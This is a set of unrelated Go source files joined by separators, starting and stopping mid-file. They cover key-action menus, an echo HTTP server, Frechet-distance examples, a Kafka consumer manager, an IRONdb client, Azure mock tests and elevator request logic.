assert.Equal(t, telegram.GasUsed, 0.866, "")
}
func TestSplitTelegram(t *testing.T) {
scanner := bufio.NewScanner(strings.NewReader("a!b!c"))
scanner.Split(SplitTelegram)
res := []string{}
for scanner.Scan() {
res = append(res, scanner.Text())
}
assert.Equal(t, res, []string{"a", "b", "c"}, "")
}
|
/*
Copyright 2022 The KubeVela Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package model
import (
"sort"
"github.com/gdamore/tcell/v2"
)
// KeyAction is key action struct
type KeyAction struct {
Description string
Action func(*tcell.EventKey) *tcell.EventKey
Visible bool
Shared bool
}
// KeyActions is a map from key to action
type KeyActions map[tcell.Key]KeyAction
// Hint convert key action map to menu hints
func (ka KeyActions) Hint() []MenuHint {
tmp := make([]int, 0)
for k := range ka {
tmp = append(tmp, int(k))
}
sort.Ints(tmp)
hints := make([]MenuHint, 0)
for _, key := range tmp {
if name, ok := tcell.KeyNames[tcell.Key(key)]; ok {
hints = append(hints,
MenuHint{
Key: name,
Description: ka[tcell.Key(key)].Description,
},
)
}
}
return hints
}
// Add a key action to key action map
func (ka KeyActions) Add(actions KeyActions) {
for k, v := range actions {
ka[k] = v
}
}
// Set a key action to key action map
func (ka KeyActions) Set(actions KeyActions) {
for k, v := range actions {
ka[k] = v
}
}
// Delete aim key from key action map
func (ka KeyActions) Delete(kk []tcell.Key) {
for _, k := range kk {
delete(ka, k)
}
}
// Clear key action map clear up
func (ka KeyActions) Clear() {
for k := range ka {
delete(ka, k)
}
}
|
/*
Create a user defined struct with the identifier “person” the fields:
first
last
age
attach a method to type person with
the identifier “speak”
the method should have the person say their name and age
create a value of type person
call the method from the value of type person
*/
package main
import "fmt"
type person struct {
first string
last string
age int
}
func (p person) speak() {
fmt.Printf("Hi, my name is %v and I am %v years old\n", p.first+" "+p.last, p.age)
}
func main() {
p := person{
"Great",
"Sorcerer",
641,
}
p.speak()
}
|
package main
import (
"encoding/json"
"io/ioutil"
"net/http"
"os"
"strings"
)
type request struct {
URL string `json:"url"`
Method string `json:"method"`
Headers http.Header `json:"headers"`
Environ []string `json:"environ"`
Body []byte `json:"body"`
}
const EnvPrefix = "ECHO_"
func environ() []string {
env := make([]string, 0)
for _, e := range os.Environ() {
if strings.HasPrefix(e, EnvPrefix) {
env = append(env, strings.TrimPrefix(e, EnvPrefix))
}
}
return env
}
func handle(rw http.ResponseWriter, r *http.Request) {
var err error
rr := &request{}
rr.Method = r.Method
rr.Headers = r.Header
rr.URL = r.URL.String()
rr.Environ = environ()
rr.Body, err = ioutil.ReadAll(r.Body)
if err != nil {
http.Error(rw, err.Error(), http.StatusInternalServerError)
return
}
rrb, err := json.Marshal(rr)
if err != nil {
http.Error(rw, err.Error(), http.StatusInternalServerError)
return
}
rw.Header().Set("Content-Type", "application/json")
rw.Write(rrb)
}
func main() {
http.HandleFunc("/", handle)
http.ListenAndServe(":8000", nil)
}
|
package main
import (
fretchet "github.com/artpar/frechet/frechet"
// "fmt"
"fmt"
)
func main() {
var frechet fretchet.FrechetDistance;
var curveA, curveB [][]float64;
var dist float64;
// two curves in 3D
curveA = [][]float64{[]float64{0, -497.75619757841895}, []float64{559.4405594405595, -592.7969328517269}, []float64{1153.8461538461538, -746.6108377369661}, []float64{1748.2517482517483, -909.9922089511371}, []float64{2342.6573426573427, -1000}, []float64{2937.062937062937, -949.8966475584696}, []float64{3531.4685314685316, -719.3743228266028}, []float64{4090.909090909091, -439.86293936085747}, []float64{4685.314685314685, -227.8895214941}, []float64{5279.72027972028, -109.157671952481}, []float64{5874.125874125874, -42.826627522605804}, []float64{6468.531468531469, -8.021665145351108}, []float64{7062.937062937063, 77.1438213019494}, []float64{7622.377622377623, 264.29833021335367}, []float64{8216.783216783217, 533.4807776278296}, []float64{8811.188811188811, 866.6588667982098}, []float64{9405.594405594406, 1000}, []float64{10000, 790.0316097458776}};
curveB = [][]float64{[]float64{0, -695.1611497647639}, []float64{544.8717948717949, -790.4777475298525}, []float64{1089.7435897435898, -892.1572902869895}, []float64{1634.6153846153845, -958.3213539384153}, []float64{2179.4871794871797, -1000}, []float64{2724.358974358974, -960.1329406719366}, []float64{3269.230769230769, -826.0042769490638}, []float64{3782.051282051282, -602.0035693135744}, []float64{4326.923076923077, -413.717890336045}, []float64{4871.794871794872, -299.96868420084854}, []float64{5416.666666666667, -253.97993813506912}, []float64{5961.538461538462, -217.38757274473835}, []float64{6506.410256410257, -175.92754425757016}, []float64{7051.282051282051, -70.35247519388975}, []float64{7564.102564102564, 104.99846910576912}, []float64{8108.974358974359, 345.94199721600626}, []float64{8653.846153846154, 684.4321262067106}, []float64{9198.71794871795, 983.762187449438}, []float64{9743.589743589744, 999.9999999999998}, []float64{10000, 699.4095383377385}};
// L-1 in 3 dimensions
frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.L1(2));
dist = frechet.ComputeDistance(curveA, curveB);
fmt.Printf("Distance 1 : %f\n\n\n\n\n", dist)
// two curves in 4D
// L-infinity in 4 dimensions
frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.LInfinity(2));
dist = frechet.ComputeDistance(curveA, curveB);
fmt.Printf("Distance 2 : %f\n\n\n\n\n", dist)
// two curves in 2D
// 1.1-approximation of Euclidean (in 2 dimensions) (NB: any value above sqrt(2) uses sqrt(2) as approximation value)
frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.EpsApproximation2D(1.009));
dist = frechet.ComputeDistance(curveA, curveB);
fmt.Printf("Distance 3 : %f\n\n\n\n\n", dist)
// 6-regular polygon (in 2 dimensions)
// implementation supports only symmetric polyhedra, so parameter must be even!
frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.KRegular2D(8));
dist = frechet.ComputeDistance(curveA, curveB);
fmt.Printf("Distance 4 : %f\n", dist)
}
//
//func main() {
// var frechet fretchet.FrechetDistance;
// var curveA, curveB [][]float64;
// var dist float64;
//
// // two curves in 3D
// curveA = [][]float64{[]float64{0, 0, 0}, []float64{1, 1, 0}, []float64{0, 1, 2}, []float64{2, 1, 2}};
// curveB = [][]float64{[]float64{0, 0, 0}, []float64{2, 1, 2}};
//
// // L-1 in 3 dimensions
// frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.L1(3));
// dist = frechet.ComputeDistance(curveA, curveB);
// fmt.Printf("Distance 1 : %f\n\n\n\n\n", dist)
// // two curves in 4D
// curveA = [][]float64{[]float64{0, 0, 0, -3}, []float64{1, 1, 6, 5}, []float64{0, 8, 2, -2}};
// curveB = [][]float64{[]float64{0, 0, 0, 1}, []float64{2, 1, 2, 7}};
//
// // L-infinity in 4 dimensions
// frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.LInfinity(4));
// dist = frechet.ComputeDistance(curveA, curveB);
// fmt.Printf("Distance 2 : %f\n\n\n\n\n", dist)
//
// // two curves in 2D
// curveA = [][]float64{[]float64{0, 0}, []float64{1, 6}, []float64{0, 8}};
// curveB = [][]float64{[]float64{1, 0}, []float64{2, 7}, []float64{-1, 5}};
//
// // 1.1-approximation of Euclidean (in 2 dimensions) (NB: any value above sqrt(2) uses sqrt(2) as approximation value)
// frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.EpsApproximation2D(1.1));
// dist = frechet.ComputeDistance(curveA, curveB);
// fmt.Printf("Distance 3 : %f\n\n\n\n\n", dist)
//
// // 6-regular polygon (in 2 dimensions)
// // implementation supports only symmetric polyhedra, so parameter must be even!
// frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.KRegular2D(6));
// dist = frechet.ComputeDistance(curveA, curveB);
// fmt.Printf("Distance 4 : %f\n", dist)
//}
//
|
// testadd project doc.go
/*
testadd document
*/
package main
|
package utils
import (
"fmt"
"testing"
)
func TestRandom(t *testing.T) {
}
func TestGetUniqueId(t *testing.T) {
t.Logf("id: %v", GetUniqueId())
}
func TestRandString(t *testing.T) {
for i := 1; i <= 10; i++ {
t.Logf("str: %v", RandString(32))
t.Logf("len: %v", len(RandString(32)))
}
}
func TestRemoveRepeatedElement(t *testing.T) {
n := []int64{1, 3, 4, 4, 2, 2, 5, 21, 3, 12, 3, 87, 123, 123, 1, 3, 5, 1, 123, 123}
//a := DistinctSliceOnIt64(n)
//delRepeatElem(n)
a := removeDuplication_map(n)
t.Logf("a:%v", a)
}
func delRepeatElem(nums []int64) int {
fmt.Println(nums, &nums[0])
for i := 0; i < len(nums)-1; i++ {
if nums[i]^nums[i+1] == 0 { //重复元素执行异或操作等于0.
nums = append(nums[:i], nums[i+1:]...) //删除重复元素
}
}
fmt.Println(nums, &nums[0])
return len(nums)
}
func TestSort(t *testing.T) {
var sli = []int64{4, 3, 3, 15, 131, 1, 5, 3, 6, 4, 57, 9, 31, 23, 25}
length := len(sli)
var minIdx int
var temp int64
for i := 0; i < length-1; i++ {
minIdx = i
for j := i + 1; j < length; j++ {
if sli[j] < sli[minIdx] {
minIdx = j
}
}
temp = sli[i]
sli[i] = sli[minIdx]
sli[minIdx] = temp
}
t.Logf("sli: %v", sli)
}
func removeDuplication_map(arr []int64) []int64 {
set := make(map[int64]struct{}, len(arr))
j := 0
for _, v := range arr {
_, ok := set[v]
if ok {
continue
}
set[v] = struct{}{}
arr[j] = v
j++
}
return arr[:j]
}
|
package main
import "fmt"
const (
a = iota
b
c
d
)
func main() {
const e = iota
fmt.Println(a)
fmt.Println(b)
fmt.Println(c)
fmt.Println(d)
fmt.Println(e)
}
|
package gosnowth
import (
"context"
"fmt"
"path"
)
// LocateMetric returns a list of nodes owning the specified metric.
func (sc *SnowthClient) LocateMetric(uuid string, metric string,
node ...*SnowthNode,
) ([]TopologyNode, error) {
if len(node) > 0 {
return sc.LocateMetricRemote(uuid, metric, node[0])
}
topo, err := sc.Topology()
if err != nil {
return nil, err
}
return topo.FindMetric(uuid, metric)
}
// LocateMetricContext is the context aware version of LocateMetric.
func (sc *SnowthClient) LocateMetricContext(ctx context.Context, uuid string,
metric string, node ...*SnowthNode,
) ([]TopologyNode, error) {
if len(node) > 0 {
return sc.LocateMetricRemoteContext(ctx, uuid, metric, node[0])
}
topo, err := sc.Topology()
if err != nil {
return nil, err
}
return topo.FindMetric(uuid, metric)
}
// LocateMetricRemote locates which nodes contain specified metric data.
func (sc *SnowthClient) LocateMetricRemote(uuid string, metric string,
node *SnowthNode,
) ([]TopologyNode, error) {
return sc.LocateMetricRemoteContext(context.Background(),
uuid, metric, node)
}
// LocateMetricRemoteContext is the context aware version of LocateMetricRemote.
func (sc *SnowthClient) LocateMetricRemoteContext(ctx context.Context,
uuid string, metric string, node *SnowthNode,
) ([]TopologyNode, error) {
r := &Topology{}
if node == nil {
nodes := sc.ListActiveNodes()
if len(nodes) == 0 {
return nil, fmt.Errorf("no active nodes")
}
node = nodes[0]
}
body, _, err := sc.DoRequestContext(ctx, node, "GET",
path.Join("/locate/xml", uuid, metric), nil, nil)
if err != nil {
return nil, err
}
if err := decodeXML(body, &r); err != nil {
return nil, fmt.Errorf("unable to decode IRONdb response: %w", err)
}
if r.WriteCopies == 0 {
r.WriteCopies = r.OldWriteCopies
}
r.OldWriteCopies = r.WriteCopies
return r.Nodes, nil
}
|
package main
import (
"net/http"
"strings"
"text/template"
//"path"
//"github.com/op/go-logging"
)
var (
//log = logging.MustGetLogger("main")
)
type playHandler struct {
root string
tmpl string
}
func playServer(root, template string) http.Handler {
return &playHandler{root, template}
}
func (u *playHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
dir := strings.TrimPrefix(r.URL.Path, cfgRoot + "/play/")
//dst := path.Join(u.root, dir)
html, _ := Asset(u.tmpl)
funcMap := template.FuncMap{
/*
"humanizeBytes": humanizeBytes,
"humanizeTime": humanizeTime,
"isZip": isZip,
*/
}
t, err := template.New("").Funcs(funcMap).Parse(string(html))
if err != nil {
log.Warning("error %s", err)
}
//files, err := ioutil.ReadDir(path.Join(v.root, r.URL.Path))
//sort.Sort(byName(files))
url := r.Header.Get("Referer")
t.Execute(w, struct {
FileMP3 string
Referer string
}{
dir,
url,
})
}
|
package etw
import (
"github.com/narph/etwbeat/config"
"github.com/pkg/errors"
"github.com/elastic/beats/v7/libbeat/beat"
"github.com/elastic/beats/v7/libbeat/common"
"github.com/elastic/beats/v7/libbeat/common/fmtstr"
"github.com/elastic/beats/v7/libbeat/logp"
"github.com/elastic/beats/v7/libbeat/processors"
)
const (
EVENT_TRACE_CONTROL_STOP = 1
EVENT_CONTROL_CODE_DISABLE_PROVIDER = 0
EVENT_CONTROL_CODE_ENABLE_PROVIDER = 1
PROCESS_TRACE_MODE_REAL_TIME = 0x00000100
PROCESS_TRACE_MODE_RAW_TIMESTAMP = 0x00001000
PROCESS_TRACE_MODE_EVENT_RECORD = 0x10000000
EVENT_HEADER_FLAG_STRING_ONLY = 0x0004
EVENT_HEADER_PROPERTY_XML = 0x0001
)
type Consumer struct {
log *logp.Logger
Config consumerConfig
eventMeta common.EventMetadata
processors beat.ProcessorList
client beat.Client
}
type consumerConfig struct {
common.EventMetadata `config:",inline"` // Fields and tags to add to events.
Processors processors.PluginConfig `config:"processors"`
Index fmtstr.EventFormatString `config:"index"`
}
func NewConsumer(options *common.Config, beatInfo beat.Info) (*Consumer, error) {
c := consumerConfig{}
if err := options.Unpack(&c); err != nil {
return nil, err
}
processorsForConfig, err := processorsForConfig(beatInfo, c)
if err != nil {
return nil, err
}
return &Consumer{
log: logp.NewLogger("etw"),
Config: c,
processors: processorsForConfig,
}, nil
}
func (c *Consumer) Run(done <-chan struct{}, pipeline beat.Pipeline, session config.Session) {
client, err := c.connect(pipeline)
if err != nil {
logp.Warn("EventLog[%s] Pipeline error. Failed to connect to publisher pipeline",
"session")
return
}
c.client = client
// close client on function return or when `done` is triggered (unblock client)
defer c.client.Close()
go func() {
<-done
c.client.Close()
}()
sessionHandle, sessionProperties, err := enableTrace(session)
if err != nil {
c.log.Errorf("session %s could not be enabled: %v", session.Name, err)
return
}
defer func() {
guid, _ := GUIDFromString(session.Providers[0])
c.log.Info("Session %s, stop processing.", session.Name)
if err := stopTrace(sessionHandle, sessionProperties, guid); err != nil {
c.log.Errorf("session %s could not be closed: %v", session.Name, err)
return
}
}()
err = c.readEvents(session.Name)
if err != nil {
c.log.Errorf("session %s could not read events: %v", session.Name, err)
return
}
}
func (c *Consumer) connect(pipeline beat.Pipeline) (beat.Client, error) {
return pipeline.ConnectWith(beat.ClientConfig{
PublishMode: beat.GuaranteedSend,
Processing: beat.ProcessingConfig{
EventMetadata: c.eventMeta,
Processor: c.processors,
},
ACKCount: func(n int) {
c.log.Info("successfully published %d events", n)
},
})
}
func (c *Consumer) readEvents(sessionName string) error {
err := openTrace(sessionName, c.bufferCallback, c.eventReceivedCallback)
if err != nil {
return errors.Wrap(err, "Failed to open trace")
}
return nil
}
func (c *Consumer) bufferCallback(etl *EventTraceLogfile) uintptr {
_ = etl
return 1
}
func (c Consumer) eventReceivedCallback(er *EventRecord) uintptr {
c.client.Publish(er.ToEvent())
return 0
}
|
package main
import (
"encoding/json"
"fmt"
"mysql_byroad/model"
"strings"
"sync"
"time"
"github.com/Shopify/sarama"
log "github.com/Sirupsen/logrus"
"github.com/samuel/go-zookeeper/zk"
"github.com/wvanbergen/kafka/consumergroup"
)
type Entity struct {
Database string `json:"database"`
Table string `json:"table"`
BeforeColumns Columns `json:"beforeColumns"`
AfterColumns Columns `json:"afterColumns"`
EventType string `json:"eventType"`
ExecuteTime int64 `json:"executeTime"`
}
type Columns []*Column
type Column struct {
Name string `json:"name"`
Value string `json:"value"`
SqlType int `json:"sqlType"`
IsKey bool `json:"isKey"`
IsNull bool `json:"isNull"`
Updated bool `json:"updated"`
}
func (columns Columns) String() string {
var ret string
for _, column := range columns {
ret += fmt.Sprintf("%+v ", column)
}
return ret
}
func (entity *Entity) String() string {
ret := fmt.Sprintf("%s.%s:%s[%+s->%+s]", entity.Database, entity.Table, entity.EventType, entity.BeforeColumns.String(), entity.AfterColumns.String())
return ret
}
func (entity *Entity) Encode() ([]byte, error) {
return json.Marshal(entity)
}
func (entity *Entity) Length() int {
data, err := json.Marshal(entity)
if err != nil {
return 0
}
return len(data)
}
type KafkaHandler interface {
HandleKafkaEvent(entity *Entity, group string)
}
type KafkaConsumer struct {
Topics []string
GroupID string
consumer *consumergroup.ConsumerGroup
handlers []KafkaHandler
}
/*
新建kafka consumer,使用consumer group的方式订阅topic
*/
func NewKafkaConsumer(topics []string, groupid string, kafkaconfig KafkaConfig) (*KafkaConsumer, error) {
kconsumer := KafkaConsumer{
Topics: topics,
GroupID: groupid,
handlers: make([]KafkaHandler, 0, 1),
}
config := consumergroup.NewConfig()
config.Offsets.Initial = sarama.OffsetNewest
config.Offsets.ProcessingTimeout = kafkaconfig.OffsetProcessingTimeout.Duration
config.Offsets.ResetOffsets = kafkaconfig.OffsetResetOffsets
config.ClientID = "byroad"
config.Zookeeper.Chroot = kafkaconfig.ZKChroot
consumer, err := consumergroup.JoinConsumerGroup(groupid, topics, kafkaconfig.ZkAddrs, config)
log.Infof("new kafka consumers for %s, %+v", groupid, topics)
if err != nil {
return nil, err
}
kconsumer.consumer = consumer
return &kconsumer, nil
}
func (kconsumer *KafkaConsumer) HandleMessage() {
go func() {
for msg := range kconsumer.consumer.Messages() {
log.Debugf("receive consumer message")
entity := Entity{}
err := json.Unmarshal(msg.Value, &entity)
if err != nil {
log.Errorf("kafka consumer unmarshal error: %s", err.Error())
}
for _, handler := range kconsumer.handlers {
handler.HandleKafkaEvent(&entity, kconsumer.GroupID)
}
err = kconsumer.consumer.CommitUpto(msg)
if err != nil {
log.Errorf("kafka commitupto error: %s", err.Error())
}
}
}()
go func() {
for err := range kconsumer.consumer.Errors() {
log.Errorf("consumer error: %s", err)
}
}()
}
func (kconsumer *KafkaConsumer) AddHandler(handler KafkaHandler) {
kconsumer.handlers = append(kconsumer.handlers, handler)
}
func (kconsumer *KafkaConsumer) Close() error {
return kconsumer.consumer.Close()
}
type KafkaConsumerManager struct {
consumers map[string]*KafkaConsumer
sync.RWMutex
config KafkaConfig
handlers []KafkaHandler
}
func NewKafkaConsumerManager(config KafkaConfig) *KafkaConsumerManager {
manager := KafkaConsumerManager{
consumers: make(map[string]*KafkaConsumer),
config: config,
}
return &manager
}
func (kcm *KafkaConsumerManager) Add(kc *KafkaConsumer) {
kcm.Lock()
kcm.consumers[kc.GroupID] = kc
kcm.Unlock()
}
func (kcm *KafkaConsumerManager) Delete(kc *KafkaConsumer) {
kcm.Lock()
delete(kcm.consumers, kc.GroupID)
kcm.Unlock()
}
func (kcm *KafkaConsumerManager) Get(groupid string) *KafkaConsumer {
kcm.RLock()
defer kcm.RUnlock()
return kcm.consumers[groupid]
}
func (kcm *KafkaConsumerManager) Iter() <-chan *KafkaConsumer {
ch := make(chan *KafkaConsumer)
go func() {
kcm.RLock()
for _, kc := range kcm.consumers {
ch <- kc
}
kcm.RUnlock()
close(ch)
}()
return ch
}
func (kcm *KafkaConsumerManager) IterBuffered() <-chan *KafkaConsumer {
ch := make(chan *KafkaConsumer, kcm.Len())
go func() {
kcm.RLock()
for _, kc := range kcm.consumers {
ch <- kc
}
kcm.RUnlock()
close(ch)
}()
return ch
}
func (kcm *KafkaConsumerManager) Len() int {
kcm.RLock()
length := len(kcm.consumers)
kcm.RUnlock()
return length
}
func (kcm *KafkaConsumerManager) GroupExists(groupid string) bool {
kcm.RLock()
_, ok := kcm.consumers[groupid]
kcm.RUnlock()
return ok
}
/*
根据任务的数据库-表信息,新建kafka consumer
*/
func (kcm *KafkaConsumerManager) InitConsumers(tasks []*model.Task) {
wg := sync.WaitGroup{}
for _, task := range tasks {
if task.SubscribeStat == model.TASK_STAT_SUBSCRIBE {
wg.Add(1)
go func(t *model.Task) {
for _, handler := range kcm.handlers {
kcm.traverseTask(t, handler, kcm.config.OffsetResetOffsets)
}
wg.Done()
}(task)
}
}
wg.Wait()
}
/*
添加handler
*/
func (kcm *KafkaConsumerManager) AddHandler(handler KafkaHandler) {
kcm.handlers = append(kcm.handlers, handler)
}
/*
停止所有的kafka consumer
*/
func (kcm *KafkaConsumerManager) StopConsumers() {
wg := sync.WaitGroup{}
for consumer := range kcm.Iter() {
wg.Add(1)
go func(c *KafkaConsumer) {
log.Infof("close consumer %s", c.GroupID)
err := c.Close()
if err != nil {
log.Errorf("kafka consumer close error: %s", err.Error())
}
wg.Done()
}(consumer)
}
wg.Wait()
}
/*
遍历任务订阅的所有字段信息,为没有订阅kafka相应topic的字段添加consumer
*/
func (kcm *KafkaConsumerManager) AddTask(task *model.Task) {
for _, handler := range kcm.handlers {
kcm.traverseTask(task, handler, true)
}
}
/*
根据任务订阅的字段信息,更新consumer
*/
func (kcm *KafkaConsumerManager) UpdateTask(task *model.Task) {
groupid := GenGroupID(task)
consumer := kcm.Get(groupid)
if consumer != nil {
consumer.consumer.Close()
kcm.Delete(consumer)
}
for _, handler := range kcm.handlers {
kcm.traverseTask(task, handler, false)
}
}
func (kcm *KafkaConsumerManager) StartTask(task *model.Task) {
kcm.AddTask(task)
}
// 停止订阅,从consumerManager中删除相应的consumer
func (kcm *KafkaConsumerManager) StopTask(task *model.Task) {
groupid := GenGroupID(task)
consumer := kcm.Get(groupid)
if consumer != nil {
consumer.Close()
kcm.Delete(consumer)
}
}
func (kcm *KafkaConsumerManager) DeleteTask(task *model.Task) {
kcm.StopTask(task)
}
// 遍历任务的字段信息,增加相应的订阅
func (kcm *KafkaConsumerManager) traverseTask(task *model.Task, handler KafkaHandler, resetOffset bool) {
topics := kcm.getTopics(task)
if len(topics) == 0 {
log.Errorf("no matched kafka topic found for %s!", task.Name)
return
}
groupid := GenGroupID(task)
if !kcm.GroupExists(groupid) {
config := kcm.config
config.OffsetResetOffsets = resetOffset
consumer, err := NewKafkaConsumer(topics, groupid, config)
if err != nil {
log.Errorf("new kafka consumer error: %s", err.Error())
return
}
consumer.AddHandler(handler)
consumer.HandleMessage()
kcm.Add(consumer)
}
}
type empty struct{}
// 得到任务订阅的字段信息对应的所有的topic
func (kcm *KafkaConsumerManager) getTopics(task *model.Task) []string {
topics := make([]string, 0, 10)
set := make(map[string]empty)
allTopics, err := kcm.getAllTopics()
if err != nil {
return topics
}
for _, field := range task.Fields {
matched := getMatchedTopics(allTopics, field)
for _, topic := range matched {
set[topic] = empty{}
}
}
for topic, _ := range set {
topics = append(topics, topic)
}
return topics
}
// 从zookeeper中得到所有的topic
func (kcm *KafkaConsumerManager) getAllTopics() ([]string, error) {
conn, _, err := zk.Connect(kcm.config.ZkAddrs, time.Second*10)
if err != nil {
return nil, err
}
defer conn.Close()
children, _, err := conn.Children(kcm.config.ZKChroot + "/brokers/topics")
if err != nil {
return nil, err
}
log.Debugf("get all topics: %+v", children)
return children, nil
}
// 匹配用户订阅的字段信息和topic,返回匹配上的topic
func getMatchedTopics(topics []string, field *model.NotifyField) []string {
matched := make([]string, 0, 10)
for _, topic := range topics {
s := strings.SplitN(topic, "___", 2)
if len(s) != 2 {
log.Errorf("get matched topics split topic: %s", topic)
continue
}
schema := s[0]
table := s[1]
if isMatch(field.Schema, schema) && isMatch(field.Table, table) {
matched = append(matched, topic)
}
}
return matched
}
|
package main
import "fmt"
var age = test()
func test() int {
fmt.Println("test")
return 90
}
//init函数,完成一些初始化的工作
func init() {
fmt.Println("main init")
}
func main() {
fmt.Println("main----age=", age)
}
|
package main
import (
"fmt"
"html/template"
"im/app/controller"
"log"
"net/http"
)
// 注册模板
func registerView() {
//basePath, _ := os.Getwd()
tpl, err := template.ParseGlob("./app/view/*")
if err != nil {
log.Fatal(err)
}
for _, v := range tpl.Templates() {
tplName := v.Name()
fmt.Println(tplName)
http.HandleFunc(tplName, func(w http.ResponseWriter, r *http.Request) {
tpl.ExecuteTemplate(w, tplName, nil)
})
}
}
func main() {
// 静态文件
http.Handle("/asset/", http.FileServer(http.Dir(".")))
// 用户上传的资源文件
http.Handle("/resource/", http.FileServer(http.Dir(".")))
registerView()
// 注册
http.HandleFunc("/register", controller.UserRegister)
// 登录
http.HandleFunc("/login", controller.UserLogin)
// chat router
http.HandleFunc("/chat", controller.Chat)
log.Fatal(http.ListenAndServe(":3000", nil))
}
|
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT license.
package armhelpers
import (
"context"
"testing"
)
func TestGetLogAnalyticsWorkspaceInfo(t *testing.T) {
mc, err := NewHTTPMockClient()
if err != nil {
t.Fatalf("failed to create HttpMockClient - %s", err)
}
mc.RegisterLogin()
mc.RegisterGetLogAnalyticsWorkspaceInfo()
err = mc.Activate()
if err != nil {
t.Fatalf("failed to activate HttpMockClient - %s", err)
}
defer mc.DeactivateAndReset()
env := mc.GetEnvironment()
azureClient, err := NewAzureClientWithClientSecret(env, subscriptionID, "clientID", "secret")
if err != nil {
t.Fatalf("can not get client %s", err)
}
_, _, _, err = azureClient.GetLogAnalyticsWorkspaceInfo(context.Background(), subscriptionID, resourceGroup, logAnalyticsWorkspaceName)
if err != nil {
t.Error(err)
}
}
func TestEnsureDefaultLogAnalyticsWorkspaceUseExisting(t *testing.T) {
mc, err := NewHTTPMockClient()
if err != nil {
t.Fatalf("failed to create HttpMockClient - %s", err)
}
mc.RegisterLogin()
mc.RegisterEnsureDefaultLogAnalyticsWorkspaceUseExisting()
err = mc.Activate()
if err != nil {
t.Fatalf("failed to activate HttpMockClient - %s", err)
}
defer mc.DeactivateAndReset()
env := mc.GetEnvironment()
azureClient, err := NewAzureClientWithClientSecret(env, subscriptionID, "clientID", "secret")
if err != nil {
t.Fatalf("can not get client %s", err)
}
_, err = azureClient.EnsureDefaultLogAnalyticsWorkspace(context.Background(), resourceGroup, location)
if err != nil {
t.Error(err)
}
}
func TestEnsureDefaultLogAnalyticsWorkspaceCreateNew(t *testing.T) {
mc, err := NewHTTPMockClient()
if err != nil {
t.Fatalf("failed to create HttpMockClient - %s", err)
}
mc.RegisterLogin()
mc.RegisterEnsureDefaultLogAnalyticsWorkspaceCreateNew()
err = mc.Activate()
if err != nil {
t.Fatalf("failed to activate HttpMockClient - %s", err)
}
defer mc.DeactivateAndReset()
env := mc.GetEnvironment()
azureClient, err := NewAzureClientWithClientSecret(env, subscriptionID, "clientID", "secret")
if err != nil {
t.Fatalf("can not get client %s", err)
}
_, err = azureClient.EnsureDefaultLogAnalyticsWorkspace(context.Background(), resourceGroup, "westeurope")
if err != nil {
t.Error(err)
}
}
func TestEnsureDefaultLogAnalyticsWorkspaceCreateNewInMC(t *testing.T) {
mc, err := NewHTTPMockClient()
if err != nil {
t.Fatalf("failed to create HttpMockClient - %s", err)
}
mc.RegisterLogin()
mc.RegisterEnsureDefaultLogAnalyticsWorkspaceCreateNewInMC()
err = mc.Activate()
if err != nil {
t.Fatalf("failed to activate HttpMockClient - %s", err)
}
defer mc.DeactivateAndReset()
env := mc.GetEnvironment()
env.Name = "AzureChinaCloud"
azureClient, err := NewAzureClientWithClientSecret(env, subscriptionID, "clientID", "secret")
if err != nil {
t.Fatalf("can not get client %s", err)
}
_, err = azureClient.EnsureDefaultLogAnalyticsWorkspace(context.Background(), resourceGroup, "chinaeast2")
if err != nil {
t.Error(err)
}
}
|
package localElevatorFSM
import (
"../config"
"../elevio"
)
func requestsAbove(e Elevator) bool {
for floor := e.floor + 1; floor < config.N_FLOORS; floor++ {
for button := 0; button < config.N_BUTTONS; button++ {
if e.requests[floor][button] {
return true
}
}
}
return false
}
func requestsBelow(e Elevator) bool {
for floor := 0; floor < e.floor; floor++ {
for button := 0; button < config.N_BUTTONS; button++ {
if e.requests[floor][button] {
return true
}
}
}
return false
}
func chooseDirection(e Elevator) elevio.MotorDirection {
switch e.direction {
// Note which functions are called first for each case!
// For MD_Stop it doesn't really matter which one goes first
case elevio.MD_Up:
if requestsAbove(e) {
return elevio.MD_Up
} else if requestsBelow(e) {
return elevio.MD_Down
} else {
return elevio.MD_Stop
}
case elevio.MD_Stop:
fallthrough
case elevio.MD_Down:
if requestsBelow(e) {
return elevio.MD_Down
} else if requestsAbove(e) {
return elevio.MD_Up
} else {
return elevio.MD_Stop
}
}
return elevio.MD_Stop
}
func shouldStop(e Elevator) bool {
var floor = e.floor
switch e.direction {
case elevio.MD_Up:
return e.requests[floor][elevio.BT_HallUp] ||
e.requests[floor][elevio.BT_Cab] ||
!requestsAbove(e)
case elevio.MD_Down:
return e.requests[floor][elevio.BT_HallDown] ||
e.requests[floor][elevio.BT_Cab] ||
!requestsBelow(e)
case elevio.MD_Stop:
fallthrough
default:
return true
}
}
func clearRequestAtFloor(elevator *Elevator, orderCompleteCh chan<- elevio.ButtonEvent) {
for button := 0; button < config.N_BUTTONS; button++ {
if button != elevio.BT_Cab && elevator.requests[elevator.floor][button] {
orderCompleteCh <- elevio.ButtonEvent{Floor: elevator.floor, Button: elevio.ButtonType(button)}
}
elevator.requests[elevator.floor][button] = false
}
}
func clearRequestAtFloorSimulation(elevator *Elevator) {
for button := 0; button < config.N_BUTTONS; button++ {
elevator.requests[elevator.floor][button] = false
}
}
func clearAllRequest(elevator *Elevator) {
for floor := 0; floor < config.N_FLOORS; floor++ {
for button := 0; button < config.N_BUTTONS; button++ {
elevator.requests[floor][button] = false
}
}
}
func clearAllHallRequests(elevator *Elevator) {
for floor := 0; floor < config.N_FLOORS; floor++ {
elevator.requests[floor][elevio.BT_HallDown] = false
elevator.requests[floor][elevio.BT_HallUp] = false
}
}
|
package data
type DataClient interface {
// 将请求信息存入数据库
InsertRequestInfo(ri *RequestInfo) error
